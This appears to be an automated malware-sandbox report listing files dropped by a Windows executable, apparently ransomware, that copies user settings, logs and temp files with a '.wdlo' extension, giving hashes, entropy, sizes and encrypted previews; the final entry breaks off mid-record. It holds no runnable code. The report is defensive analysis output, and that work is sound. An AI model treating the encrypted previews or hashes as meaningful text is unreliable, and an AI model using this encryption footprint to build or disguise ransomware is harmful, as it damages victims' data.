                  SHA1:8B85E52B688DEACDDC9BA03DB64993A61D4662EB
                  SHA-256:D242CC4E091E54EEBE5754C91F28ACFC3572783E3ADCC04A4995CF2D33C514DC
                  SHA-512:EE9167F5DCCD4CAD707A5D2C84D59614B78A7C8047E97CA6445C4E1B302217FF045D317C1966DCDE358D759614D6D5313C3A60506581F12792FE91C0B47A8C67
                  Malicious:false
                  Preview:regf.].ex.,k(n..H.UkZ.B..U..@.X....v...0=.-x...B.0.[I...u.0h..Z....+..9...j/h....W..(Lf.}/.&..... S.+.....w...Yf..3.z.V.2|_-.GPD.)N...o...j....".j h.k......1..`(.... v:.uy..x:...}...H-....E....$z:.......3.RsD}.}Y.p.....W.(GiS..m~.I.fCg.S....c&.......@.......Z.U..n..gK..Q.6.>`.........hF9...C..s6f......-.......:qgUNb.22...u.._>.....Z..8^...B...z...).G.uD.._.g....w.....$.....|.-,.!.yx9.kLu=...~r..1..h|S.p..9......"...V..A.27z.x...z.:....U.T..f0w..BW.p9.<fG... G-......e~..5|"..1.O.)MI.1yC.a4.4..2)}!i...>..m...Z....9....?.M.(.Q."='j..L4+.........1..#O.....19..7.......zQ|\/..5....6....r..?..U.I...M...?Q.,.P.m..A}...m..[k.x.....Z.J...M........)......G.ny..8.|...C8.l.j=Od..e..&hyc.....H...2...:(..[.YB...#!..u..E.>#.-i.]tJ..Y...>...4..H.g.6.b.'U...#...Xd.#;.U'2...F...;`..$O.6.;.....:....b..r;EMqs3..+....z[.:7.l`m..Y...Cn..=...9'1......I).w.1c=c..w./...Wl.70.D.W.......}.U...Q.r{.0Y....D[.q...<....;!.t^...=.^....Ny1.|...`k.....f........

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):45240
                  Entropy (8bit):7.9956314217618
                  Encrypted:true
                  SSDEEP:768:QMB4lNBbtxyIbghoGmGY2kGoNHbWTmcXjcktJNeT7DQf/aDT+IKyMWXe:QMBGXbtxyIbZZl2a7WTsSJNefD+S/+1d
                  MD5:AA276B275C6CE80022F894629D452C9F
                  SHA1:7A1B66B17CE186A2436347C996094FC58BF03511
                  SHA-256:F77A64088DAF2502E80F375AE74C07F679E2648CE3BF3BF1B359C9A644531528
                  SHA-512:C36AD73C4587F3FDCCAF0738DBDCB48B56D0228623FDFF6E6C62DB27C685277257A6010A30323A278C8EE19C92C7CB454E61E05D7272D2A8F0977472F9CD2F1E
                  Malicious:true
                  Preview:E..........jL(S1.F./px..W...........U..tIv.W(4.h..od..Iu.0*......h.`.B..Q.,.0"|?0;.....~......I ......Z.G..-...D.FU....?..&..d._..DD...4..I.l....#..(.y.......|C|EW.j..9I...;nx...aHm...+p4.1XB...........h..n]5.f...3c.=..<n.Y;<."D.D.....}...T!.o.`.n.4|#h1..Ru(Os.........}..5.....>8..K..+.....W....\/.........Yp.pb..4../.#...\.....:.U~...2f......D.v..'..0.x.s.....}..u5H.....)<....4.p..{...("..pLH.u.`4.l$..x.O....O&Z.8....M[..#.I,a{..0...._.ky]AL...D...(.:.u.?.&R.....(yw..X. qc.N.#'..\.../...<v%v%..w.C.".Y[.I....w..rr.{3d..A/3w7..3.?)mU....~anb....yj.t..^...l..S..S=Z%.......7..K.B...Q.-...*..u=.>..wWxv.l..o...D0H.p../...m....g.....-.c.5s`...1. ...8B.S!MM.....#.%;.G}..k..k..=.MZ....F<....b..[....`...$....l-;...(....,.d;@..(y....&..y.6...W.F.P..l......l...3.{.).h....T.B.....{..}Y.....W).=..FEIN.a=......hb.EZ4.of.r>..7B.6[...3<t......"...6..qm....b....u..8.......#......^...B..W..v....gj..1..l#xs*6........,Q.....s....Xn|.Gmq.v;..D5#..kc.O~.[~l3

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979924439836873
                  Encrypted:false
                  SSDEEP:192:zHEXQAGpZ/8hQ0MxAmZQpO0Pt9iMeMEIe5gtbUKwYLt:IQ/qNmmpvtEMewe5M
                  MD5:4C1B6C71DA49DC275C6DDC0247B84DC7
                  SHA1:0C7135A4B14CF7CA37353D19FAA2C412030A5277
                  SHA-256:E5864291E1E5BA5AA45AF5DCDD78D27EF75F46F4FAADA415B2EC32C5D70FCF49
                  SHA-512:D10C1604EA4A7835F9A582A06A9EB57A1BFCE4B52E2EF6AA3C48BDD866D01E6B022816AE752EA93CE213582618FD58C573AC5E8C9BB1F55B9A7FF58ABCE0DAE2
                  Malicious:false
                  Preview:regf....f....",jh+(.K6...1.o.Ypl... f}F..s.8L..NPl...n..h...hw..J.I.I..i\PLa.....`k..D....I.aQ.~.c..X:.r..D.HG..K%..c.M|.%.b$.<V..aq...Z.-..S..2.=.......vE...".Gs%IL .).V....l...T..L......H./...hs.(.x.....[i.CA.}.U.....GYGu...a.......#=..E..G.T..f$?.)...T.g. H\..P..`S.as.}.Z.....Y........bh5c.T.....*.=c.........X....9........Je.c....;.7...]$...J.zP...|.-H.0.f..E..){.Z7.c._.......j.....v.......>.....t$L....X.....E...3,J ....i...^..7........r......m._...h.....S..wJ......d..G.x.>*.1.n...|V..M&...^.C.J."....&.P..+".u.W9.gB.....6uA..|_H.Jl..x..@.....p......%.<..I.z.~x..".g..3-.X.."A..,-B..~._....q.JP..@.'.E.........w..mB.Z.1..r.b6..`...m.-.q.....l.z...1v......I.e27...i..["jm.G....\.-.jd.T..F..u....BQ..jg.....=Q.}K{..81|PU..e%.B*.&..p...R..(.N..3.8=;]..i.Q/L..._]..I.|.....g~....@..OF.@...I.'#O5.-.q..#...T...{6.......R.B\.......\...p...l.l6Z.@9'.E..T........vH!.Q...6............<)^...b.E.L*.!.......X...Gq...s.Vx.hj.....E...t..R.Z........jN

                  C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97748770285942
                  Encrypted:false
                  SSDEEP:192:ACKoq9uyifKswiEI119oNy56WFn2nkBeW/vQN6E9+cmhgfi8Ajh:ACKoq9LOw1k0yJFnLdhE9+beN0h
                  MD5:3A1D5EFA4B3E58A479162B11F347AFAB
                  SHA1:F43DC7A17C88C686178F89E90888F03ABA981004
                  SHA-256:DD52FF1C784205A936591AE7F5AFB7CC3BEE3BE45A22D56DE8D35B1927471EFD
                  SHA-512:6A2CED1998A862285B31CC1278153B68C93F0FD3945CEECE6B16EEA7B49A3EF3C5F4442D1ACDDEE3957BBD57FD509264030F2FC1E5836DB42CD1D2A9275C0DE4
                  Malicious:false
                  Preview:regf.w)...QNP+.~'....f.."....+.....Y.R.WB...r..*@....s.f3v..`S...=..s.]....C..}.U>.z... ......n.}]x..-n.....tm.~...4.7W.D.RX.5.V+.'.c......mBJhkZ}.I...?@[Q.S....t.^.?...gu...........tk..i.F...&..>EQ.ew5.....T&U.P9'.....G.M.O.(....9e....2...w_3.4N[.=..b..B..G-.A..!t.A.%FL.#.W..2...wk...z.......E...x......9&T....8N..........-X...Q......WL./....3~..H..i.Xl.H.f......n..>l.?.D.:7..o..t..d.@.^4..1.V..3`.f...x.....J\S...(6N.7..QJ.7R..z8.9#|.n...s.s.......]?.C-..C.d.o>..G7.fsI2.R{.-C5...6.$.....D)C\..F.^.....k.u.g..LZ...x...o.3AL..=o`....)...v.$.s;...Q.6PV?......{.qmP.n.....kb.g..*..9.|.E.8.5.7.m!e..W{K...6...L.0...]..y...v.O.]K..a..os..D..b."......K...af.]`>=...-......O.p.(...q8rI..+~Ek....Ag...-.CJ..T...R#.....*......@8.fz;....Z...D....k...7.#)......h9.....I.f...S.:.r..'.@.....hf..P..p^=...e......X...O.~..s)]....p.6....>..q~.q."..=.N..]`E..U.`r....4.P..,...`..":-QV"U ...L.i{.uy..3......A..>CX........)e..;FJ..l.7....S...4Yn....Oc.m.....

                  C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977840756289703
                  Encrypted:false
                  SSDEEP:192:jSoRfPOOasMrmjsHvoERECPWtvGCY+ZtwV5iC8Cv/j:99advvvESPV5ii
                  MD5:0693599B5E1C68FE8A6E4CB82F5201C4
                  SHA1:DC55B246BE4B31A3EA1B72E5CBCDA36F96CF20AD
                  SHA-256:954C95F321546581A1633322A545B7A0FFFBFD2A7B49AE0E876ACD697137D3CE
                  SHA-512:AD7EA9F65AC08CA16683D14C1A1E8C862F8C21E9B2B221A47E89250C18F13CB48ED05A9F2949B1F8F5CB066EDA0FB84DE0D838A064D240EAEF9A35A6C86F2424
                  Malicious:false
                  Preview:regf...."..R^..*...x...rX>.KHP.....c........"gc.8z........k0...M.h.....E2..H...|)..SN}VI..A..Ue..O?.|..D+h.Q...-....Z.j.hE.a...P....1...*=_.Xk.V.>/L~....bw..By.....8c.......@.....2.vf..&m#n.T&.BbX.=.m.7....=l...{$...%.."..X....xd.>'.FV...v....|.tO.n9X.Jz.f.5.pP.........k.9.h.Jwk...4v....k....8.x...u0..4%...-}eBU}.Po..u...3..uv.!..z....w...|1X$..H..:..H.#Gw......=.x....5..G\"..\".X.."C..I.t...~.........'.f...._.k.m|.!6.i..Rb....o..M......0...G8....9Z.......v9...s..&A....8..Y.Id...W."VK..9../.g7b..l..{u.......Z...|.Ea.....G&....u./Z...R.,..Z.;8...7.....~Z;u"h.+^x.C..h..eS..2.....=SN.U.@..m........I..I....z.10p..E...c...B.....JN..8J..+...^..p..5U....@/.z..m.4..=.J..[.._u.....g..i'..w...>.U'.s......*...rW.l$..6..5..Fj2........!.6sn.S..IDwM.YV.R.>>......:.K...\.k..,....V.Em...Q..q..ayN.......-f...jl..#..\..:%...:..1Y........I\.P....QD{..|..L..z....!.$K..WoGuj...x...T..4...N9.K_E..yH....+...w.H.O.._."3)w.S..a....}..!p..S.....P... R....tWYG".

                  C:\Users\user\Local Settings\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.983282538413479
                  Encrypted:false
                  SSDEEP:192:LuE96hGFLrGlB7uuKuO9ZtUV38t2YTugZLLE1WILHItjB3Lfo:yE8hflB6ASZtUB8YbqvIbIQ
                  MD5:984382374FAEA3DE046D01E8692181B6
                  SHA1:5ECF153AFF8D9F623662688AC3FE41423CD7F1EB
                  SHA-256:24FF3214E48D42D032D9A810DDF709FBA55BA4818147F7AE8A14812668860FA5
                  SHA-512:41572C3286DC9DA0CC6E9BB87E8C8D2FA363F23F9918061B0EBD464818DC98EBC43AF815220CF7A637F9B3CCE049684495052D663B2A683915BC9A30AEB9AF83
                  Malicious:false
                  Preview:regf.O.....o.....(....pT.W.D.....:..).H....|....i...?..G".9...-.[!\..1V]..F...z.i.u......x..$.{$[q.Yq~..T%,.1.C......R.;p.'.......Q..\..hm"......3/..v..p.!..2U....&..-..C....:(..)j.,kQ?_.xpy.l.....7~....%:..S....X]..Tzz+.L@v.o....,:..)..IP.|.ka...t..rX.rZ...7."...%U.$[H...C..yY....P.[...LOq..w..~.Z.@....u.c=......K...v..5.s!Q.*....n.1.r(..P.oy...)Jj...#.&;..G..C...(7...:.AH.. .2^..b..s...r.(7X.kr.j.....y.T.sv....:...g.YW...N...:........;....A..>..l.S...^..8n.C.l.._UG.....vCfPa(:-..h._.<..'...1[B[..]qp..(m...........t...+...d.....?abu.p..z.=.;....i[...w.b.hN..R.=Z.2/.5.l.J..S..!|....3.`...)..G..KB...d.TBW....w.v..*-LByt6|}.#"=..]N...$....&.x..l...gh.!1EsLW....<.c...?/.`(.....L....iu.X.Q..Q.......oI..'{k...'``.o.K............pq...{...^.F.M]...s...........^[J<2...r.0w{.m...k.z... ..3....'.|..5..Q#.^-T.".nn...J.Qi....FrU!E`..|..&;.....K#.....r........iI=...<q....@..2og.O...0i..T..TD,Qa.I...P.....{GF.....p..o.e<'8p..+.....Y'.X*.vm..c

                  C:\Users\user\Local Settings\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.98036059854907
                  Encrypted:false
                  SSDEEP:192:r4rpiml5XHwaq3mVRJvOQtlDL2ax9CKFbjAthUR:r4rpia5XH7q2RFPB9CsII
                  MD5:401B52C63CCA5EAC0235BFD7D4C5AA55
                  SHA1:A5DB614B089E0FCC471ADC90AAA1DDD1EC708A11
                  SHA-256:B7C88DD2349EC433558C65C70DED8DA6F18AC55FD01F355AF30BBD4C82586CF0
                  SHA-512:788B8C9A759F1F445C60D330D532E2B9D849D50E13AFEFB52F4444C1B699016CBC2048C8D35F79CB226D88B2487E18D36842CE1E7C2D1A60C256403D27246DDE
                  Malicious:false
                  Preview:regf.:.&..'.Ly3..+4[...m..i....l.L.[-.n..f:s[............][...g.....C.....%@.g|...b.......T..9.....K.....G.x....S..Sh..........2.v.S.H.-....t.gGV^.J..S..~n&.....8......^h3c.KbX]8.:...TU.\.....C#.|F.&.................s+).-.~. 0F.m^..)(.i....F.:T......\P.b..$..>..>.f+.......k!.i...F....J...]V..D.7b`D..C.g.....Y.#.SL..<..r..P.N}.......hHa4..g.o..K.......2.wO....6<..^%,.rw..>.VBX.q.....[.eI..*g...@..f.\.....w.8.(y..k....;.JP.R...IcX@.....|^.)5......mz..r|...?.....<e..z.A...+.m.l..IN7..~..<saC_=.<.D.O..1....$....d.(..7[.........+k.G.u6s.^O+..+-@.m.......$.@.`/j.^C.uu.^......e.t.e9-.....Eu....D4Cg.Ny..2.._5......g.+..%9~O|.o...W.. .U<...h?.../0.X..*...A.gs.O..0TE..a..\[..E..da.G.l.RS......yAQX.HDA....!.Q..}...0,}....w.. N,..pB.......9..V.g.K....4.bq.sS^.....a};u..B..+..s}.e.......uS?....6..C.O....ZE..y.._.>..U&~.._....../.3.j3WFj.,...g*......}.....jiS.....~.u....#..D...*.J8,./..k.2.=.L9...[.N..8..'._...Q.I.Q.>..m.D.g.....d..T.<.N:.......R..%<..rC

                  C:\Users\user\Local Settings\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9772255039527415
                  Encrypted:false
                  SSDEEP:192:Wy2a87eFRLz8rGhA/fK5gZYq5oyJzVAyM04ulba6BbTcxMJbZEwsml4X/Z:Wy25eFRXhhSfK5aYq5TVAyicTTtYmla
                  MD5:FB175A5768D18FB2F5B3FF7E9C43ED95
                  SHA1:D8423718BA73C072832F21EBB397C9F12A18999D
                  SHA-256:5555BA441D53DC01B126EB14CE58B5ABBAB7F625C927CF67063849EEB7A32CA9
                  SHA-512:A7ACACBD55969A714B5F38FF5D0C9301A4148423F1BA927E4753AD1554AD5E4F9F58B0F1A9857A9D61E16CE44D7BDE4325F9B63DA30AF663674433E0D9F47083
                  Malicious:false
                  Preview:regf.F...]...$mMg.Z....5.,.....o.z..0..C...-j.iI].T...ajn....o*.k..\..Is.eC./q.G.).....F....9p.~..e..T....B....D...^[.X.#......./..&.~.8.t-%...}...Ag.;O.a.?.4?...H..b.2...E...NSG.Y~..F...[Re...Nr..{..$*......fs.(...T..)_.........p'B.&1;...8...'..x...gi...._.zP..A.2w......_]..~...j.d..3p}&Xa@.#3....._RZW"`...... 8...."l..:......J...;..... ..,..B..I)+!v.8._b.T..$.2.Py.Pz...v0[...T....>.t@.Q..d$e....F...3.L.S.t2.T....h.Z..y..x.....=c.e...W.sT.|.6{...i..gj.Mv].%...P.B.`....a..S+v...U.(.....c+BX.dS.,.8w. e...zO ..d.....o.V.R^.St.N*..).6...*K.J.Po....8./..,n.................).hq..6....-..*..../.f...;...a{..9...Z..k5uw.N..`.......o..UD...:.......o..c...............$._.....QX...EH;m..S.=..q..%.&C9.6%zx._e.i.....W:.D....%o..`.X..1.k?@X.....]...c)....l.;v..[.iy.|....Q..C.B...<..$2 ..D"t..U=.. .AR3..c...T.D...~.._...}.l....N.W...U...."(........#...[..[Y..#.MfN....T..=yt.. ..gc..Ae..r..Hbr^..U.-v.1.3.$)>.w.q6BK....mY.<.J....a.?'...J.....v)s..'`

                  C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65870
                  Entropy (8bit):7.997824398105183
                  Encrypted:true
                  SSDEEP:1536:c4YQwjUIHkEslLON/+n46OkU0ENmME3XW7Pt1n1nQYWMrFXOf:chpjfHkba/j6VMNmME3SPdQYJXI
                  MD5:63E72D277B9D87D0400195A56007F773
                  SHA1:FB70B7FC9E5CEC12765F613DD7171E700E9E6449
                  SHA-256:D0FBE246001C2D0508E9503F2CEA08674742ECAACB72C7066F1B4ECB53797791
                  SHA-512:753A34CBAFB1E3034FFE9E5C7D9EF1180F9AF92AB028FF0E144E97F37A5731C25F25724F4ACEBA23FBB35FBCA9A42E607D51C978CF1A05E267CB264DED9314FB
                  Malicious:true
                  Preview:.....2....D......|X.8....>XR...CE.H.h......J..zc...d...Pt.x..T..p...3.K..h.K...-_`nh\rY.-..q=J.]'.....<....6.....;...Lk.6iS..Z....1.P....Yei/>..}x.*.MQ...|Df...zI.X=..Rj....5....\.#.L3.B...1...5.yB.\..MK.9(.....+.#.Nk....M..4"...H..P.0.?..8P...K.(l..c.~...........\...ka.E..@... ..p.S..u$Y...m..n..oj4....q.~(gh2r.@hT....>x.....h..4..|...f.4..z..o=R.X.l#_3.`.y...Q.....y.:......'.3m......L9Q.2M.5... &....W".l.R.....&_r,......p)Lm.'.J...O.ihb..M..)....l.h.iepW@._rA&{.Q.j......v...5......8...).(H.y?... 6.s@-......'7..5.[.-/^h.i.........@...q0E.....{...)..n......HS....TS.Ut.:.....b.A..7..4...1..u.<..t.D...Hr..Q...In...7.l.gw.u.*.E..U5K...........#.4X...W...+;..... b.I.Z..pb.....\.d........A<p......D..|.*....9.ZFo5.j*......)mi.;..G.....9...V..I.7...g..g...=..JRo....7.P...M.aP.'.W0...4.z.|(X..8....Y..C...T...[. .>..N..:g._x..{..W.ZO...l..sv;..-m...6!.....}.x...*Y...0.....zzH..hu..H.D.J#GyF..t..?.!....YSC.4....:z....X5..X...f.....U..1.[.28.u

                  C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65870
                  Entropy (8bit):7.997300056232838
                  Encrypted:true
                  SSDEEP:1536:gHpnvKHkGpqzFZpumwtwOHpR1iZjXv7WpNpi8WB/Xn5z9VGYbu:gJvKMwRxiZbDWc3/XnBc
                  MD5:209BCE994BB0B9569014D1A10EA3FEC4
                  SHA1:55468D0479323786E1C2C9142262DA95D2C9E11E
                  SHA-256:396BD0769F8C180B35D1334E3BB4556CEAE3EA972E0B330880892BCEB059DE85
                  SHA-512:262DBA6A8DB92EC9DAC76CFBB0A4455CA94EA90EADD7C3D2682B2166911B557E5E20EA32AE7CBE7ADDCB48D790FE24B67AAF29C7F3B166C1C6DA73654699EBD6
                  Malicious:true
                  Preview:..........A..~.\..h<.....3I.......;.Ya.b.h.[.1K.#;...l@.X.N.....:&W,<....v..A...w.k...4.7l.vu..G..5H..X9.xYN7.. ....>^.H~#..q.6..^.....^Z.y..'...CF.4...5.....iT."..A4...[..4..%d....@.m..o.4'.R..}...j..<...S>+........J.LP.d..@......5....#.....&ap.[jbJ.e.>0.b..a..8Z..X.....E..2 (......K..,....u...X.J..6..F?.W.]....\=.....D.Y.V..(S.+...+.J.'..?.=z.2....}.fr-#..h.....I.......2;../p.*...#)..r..0.z/.....|.i.3..".....w....^lnrl..`..@.=;.....9.y..'......7.)...T..`..~..0VW..].H....k....|d...0..V^.x.CEH..5....0.....d.ii..... F.,c..&..q...A@.K.yyj.y....^........c..\...UT.=...{d...D.<..P...b...g....q....x.2S........Uv..@.J.ll.....t.OY{. .$..:g.|..sy.{.Y..$fh.P.C> ..).+.v..e.....!.t.'..XeE.^V..M...3'......N=9..ML..F>.....*.....@+..t...$R..F7T....K..%..lv..../.*;.Gl...i..|...u.G.{..6K.e....&5..(.~.=Z.9!}K...wX.C}.@ ....Z.......&.@.QP...I."Bt..........e.cM.r..?..@>*H..1)Ovx.Za.'!u.O..-....Q.ae..dT...$.WW*..r.6*P....+...{........`}:A...q.

                  C:\Users\user\Local Settings\Temp\.ses.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):387
                  Entropy (8bit):7.247058388376485
                  Encrypted:false
                  SSDEEP:12:QxV5Ydm0r9xJbo1//MldZ5cLzLbU936Wcii9a:QhYdPxVoplzs3zbD
                  MD5:5EFD295B36BA6A716CADB772D2554BDB
                  SHA1:31647B40D69743EB90905BF2CAB2BCA8F1CDF5CB
                  SHA-256:32C8C46BB30BB955708724E9C87C854B910A9C36F8800E75D18753547F3C45D6
                  SHA-512:D170DAEA01C8A03A29A41B09F412EE02DC6030269BFED2A248032E2B04B74B9D5E54EE926C95D84E156197DB6A1692BF3E131CDEEC67330C1CF1B13F297FB45E
                  Malicious:false
                  Preview:16964............y.....5.......UhP28.DG............0.....~l....4..M_LMf.x.q...K.Nz_..f.Z.-."W.rE.q.`..yc..o......@[[4N...4..SW....eUim>......`............Q.\.5V..^_...fW.....`.-..^.K>&.....m..e.....'5D.......N.$kN.... ..................@1..+277..:<... .4.#Mh.n...k~qM0...y....x...P.N..lv..>i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Temp\08155A67.exe.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):1.5
                  Encrypted:false
                  SSDEEP:3:Nv:9
                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                  Malicious:false
                  Preview:foo.

                  C:\Users\user\Local Settings\Temp\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 1424908803
                  Category:dropped
                  Size (bytes):1332939
                  Entropy (8bit):7.991183295594699
                  Encrypted:true
                  SSDEEP:24576:hRoMvx9HyhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLg:PowxI5L371GFrbBKiyGAo0EzatGaZ
                  MD5:095071F1A1DD8B588DDF87CFEAFF1ADB
                  SHA1:ED7C542A14475252C6480F31AECC21CD08793BD1
                  SHA-256:3D2C5D6080EDE1644AFA5B04D8DC5CDA382E5436BDEE1050161D81BA102101E3
                  SHA-512:8EE641698AC44A5C9D25EA05F9CC229DFDA3B8E8B18F97129D0E1E0ED6FB1519E58FE2E7ADAEA660B2F9C3F1342480827A33BD7B07F2658D77A99D32E53C3631
                  Malicious:true
                  Preview:Cr24.b.T*3:..k...I^.*..4c!.L..c.|.2L].z....P.."...w..U3..;.8.q.(.r.<...HUA.Y....l...&.i.*..J..[..$.3.D.....S.t^.J&.L.3+....... ....L.#..M.a.`..v.|...!...=E]].xM..;E..N\..L.o.>..Q.G@..X.5.Ay.Z.o.yX[..0..Ga..v..zM8y.......!.......x.y...(...V*.\k80.6q.%.d.S-.q".....z..T..`...|...&.N.{..........m)....W.W...-./...5...0l:....@k.%.VFI.oI....%..K.... .}.A.......m{.xj8L.".~...d..S.....u.N...%.c..0.w...'m`.m.?Gv....,Y......3.!....I0....l.W..Eo.}........Cp.h..f/h..6A..|-U..Y..M...$..xpKqn..`.............|....sI.....}..(...{.].]......E..0..7.S..f..5...;..nkG...$...Z.m#3iJ.....y...D......V...9..[)P.)^L.[)....J.CY,t...z&......(hT...7J...o4.-zS.8..W.(.l..\..Wm.....z..).~>a...L.PKU^S..L...g..W...j.}.$...|..,.B..J.....oO$...W ..l.I.L..|....'Is. V.Qj.}...D......^..q3...q....p@...(.0q#.zd25.)..M...Du.....y(..aP[...t:..x.8.%.......n+o5..Ph.K.k.b8....a.YO...6(.S...k4oy..P..bt..Gy#[..............L..d.. ...w6.u.....f.iE.0VS.$am..&.SB[...I..:.o.DO..vEDT..X:.k.

                  C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.session64.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997481613544612
                  Encrypted:true
                  SSDEEP:1536:xR6PIsHAS8Au8FVeqOEu4zM/l0oQcQqqUWJTohohTQa8Oj:NsHAFAu8fM1fQ10ohMROj
                  MD5:A693FDFAB49D6FA793FF351060BAC679
                  SHA1:A2B5E339FE8CF09FBE3A1C28D6A0940E922EAE60
                  SHA-256:D1C1FD061F3764751CEBC248064C1B8ABBED1AD1D194140DD7FFB1F21E85F49F
                  SHA-512:95E77B3D2C26D95C3261213DE34FD54315CC5DDB98242EB2A16F8E2FCCE37EE2957F64D9FDFFCC5F45122E78D30EA7BF1C137A929F0608445A5D1ED7BD794C84
                  Malicious:true
                  Preview:1G.f..k^..n...i..n..oA.X.......2e{/.T..v\.....O.N......3.E).=x.,...x1F....4.d........./4+.q.:`.*...o.}..GC..t+..3.............V<"6b...[F..]15..@.......;.*...K.........N..yVn...Z.a(......C...R;......Ax.}m.K"....,..7D..%......V.^.s.i.......clN..TS.w.k....$4.R..{..X..:...Z,.=.r..m........%.6g.3..."...H.V^M0CJE.WM..7G..........Sj..i......`P.......c....I..AV]....'..CP....{.rpj..~.".O%.?g....&..de...+S..."Y..[..5L\x.).=pyD.1..U%..J.o.....z|...SS8..............x..en.g.W..1.Z.._..D.Z..h.~=.._+.6X5.h.B.$....CS....|dGrF..hMzO..\;m..........e.........p.W.v.MobP.`..:.'.....+....&..H..s..K...t.7.&d.....<.W...aTER\L.f.F......c....F..5.V.....@u.....6a........_IU..h........GK.....<..m.<.:...9Y..)=..........S..9Cs..@.4..t.P...Z9.L.....U<..D.2.7..W..sB.~...Qjf.....u.....g.V.c..R...^87..6_.....T.?)?z.X....r...,.:q6.)..2.|.^F.r..[.......x.....#........[...........;......Ee.qry.O...w.....O.0VLl..,.e.b..P..O..X>.6k.x...E...!/.-..~E....+.R...tw\..V..)L.

                  C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992142772819465
                  Encrypted:true
                  SSDEEP:768:XLlFLhgZxFwh7lF04nnhEBgk+WiLwHBP6PL:RGFYz5i6PL
                  MD5:B2AA8DC1E3E89BEBC415184E891D4303
                  SHA1:DE77034D8CF3FA65A8B74A64A21323AF93BA285C
